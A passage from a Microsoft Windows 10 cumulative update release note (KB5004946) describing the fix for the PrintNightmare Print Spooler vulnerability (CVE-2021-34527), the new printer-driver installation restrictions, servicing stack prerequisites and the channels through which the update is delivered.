dashboard.\n\n## Highlights\n\n * Updates a remote code execution exploit in the Windows Print Spooler service, known as \u201cPrintNightmare\u201d, as documented in [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>).\n\n## Improvements and fixes\n\nThis security update includes quality improvements. 
Key changes include:\n\n * Addresses a remote code execution exploit in the Windows Print Spooler service, known as \u201cPrintNightmare\u201d, as documented in [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>). After installing this and later Windows updates, users who are not administrators can only install signed print drivers to a print server. By default, administrators can install signed and unsigned printer drivers to a print server. The installed root certificates in the system\u2019s Trusted Root Certification Authorities trust signed drivers. Microsoft recommends that you immediately install this update on all supported Windows client and server operating systems, starting with devices that currently host the print server role. You also have the option to configure the **RestrictDriverInstallationToAdministrators** registry setting to prevent non-administrators from installing signed printer drivers on a print server. For more information, see KB5005010.\nIf you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device. \n\n**Windows Update Improvements** \n \nMicrosoft has released an update directly to the Windows Update client to improve reliability. Any device running Windows 10 configured to receive updates automatically from Windows Update, including Enterprise and Pro editions, will be offered the latest Windows 10 feature update based on device compatibility and Windows Update for Business deferral policy. This doesn't apply to long-term servicing editions.\n\n## Known issues in this update\n\nMicrosoft is not currently aware of any issues with this update.\n\n## How to get this update\n\n**Before installing this update** \n**Prerequisite:** You must install the April 13, 2021 servicing stack update (SSU) (KB5001406) or the latest SSU (KB5003974) before installing the latest cumulative update (LCU). 
SSUs improve the reliability of the update process to mitigate potential issues while installing the LCU. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and Servicing Stack Updates (SSU): Frequently Asked Questions. If you are using Windows Update, the latest SSU will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>).\n\n**Install this update**\n\n**Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update or Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nWindows Update for Business| Yes| None. This update will be downloaded and installed automatically from Windows Update in accordance with configured policies. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5004946>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows: **Product**: Windows 10, version 1903 and later; **Classification**: Security Updates \n\n**File information** \nFor a list of the files that are provided in this update, download the [file information for cumulative update 5004946](<https://download.microsoft.com/download/3/8/0/380275c2-0d42-4deb-a865-50595